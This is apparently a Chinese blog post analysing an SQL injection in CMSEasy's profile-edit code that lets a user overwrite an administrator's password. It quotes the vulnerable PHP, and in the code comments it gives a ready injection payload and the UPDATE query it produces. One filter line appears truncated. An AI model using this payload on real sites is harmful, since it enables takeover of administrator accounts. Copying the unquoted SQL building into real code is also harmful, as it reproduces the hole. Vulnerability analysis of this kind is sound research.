cmseasy修改任意管理员密码漏洞

lib/default/user_act.php
[php]
function edit_action() {
if(front::post('submit')) {
unset(front::$post['groupid']);
unset(front::$post['powerlist']);
foreach (front::$post as $k => $v){
if(is_array($v) && !empty($v)){
front::$post[$k] = implode(',', $v);
}
front::check_type(front::post($k), 'safe'); //is_safe自定义函数对其无影响,跟进0x01
}
$this->_user->rec_update(front::$post,'userid='.session::get('userid')); //问题出在这儿,跟进0x02
front::flash(lang('修改资料成功!'));
front::redirect(url::create('user/index'));
}
$this->view->data=$this->view->user;
}[/php]

lib/tool/front_class.php 0x01
[php]
static function check_type($var,$type='number') {
$func="is_$type";
if (!$func($var)) {
header("HTTP/1.0 404 Not Found");
exit('PAGE NOT FOUND!');
}
}
function is_safe($string) {
if(!$string) return true;
if(false !== strpos($string,' return false;
}
if(false !== strpos($string,'vbscript:')){
return false;
}
if(false !== strpos($string,'javascript:')){
return false;
}
/*if ($string <>addslashes($string))
return false;
else*/
return true;
}
[/php]

lib/inc/table.php 0x02
[php]
function rec_update($row,$where) {
$tbname=$this->name;
$sql=$this->sql_update($tbname,$row,$where);
//echo $sql."
";
return $this->query_unbuffered($sql);
}
function sql_update($tbname,$row,$where) {
$sqlud='';
if (is_string($row))
$sqlud=$row.' ';
else
foreach ($row as $key=>$value) {
if (in_array($key,explode(',',$this->getcolslist()))) {
$value=$value;
if (preg_match('/^\[(.*)\]$/',$value,$match))
$sqlud .= "`$key`"."= ".$match[1].","; //没加引号。只要匹配上面的正则就行,中括号里面输入注入语句就行。
//[1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1%23]
//UPDATE `cmseasy_user` SET `nickname`= 1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1
elseif ($value === "")
$sqlud .= "`$key`= NULL, ";
else
$sqlud .= "`$key`"."= '".$value."',";
}
}
$sqlud=rtrim($sqlud);
$sqlud=rtrim($sqlud,',');
$this->condition($where);
$sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where;
return $sql;
}[/php]
cms1

cms2

发表评论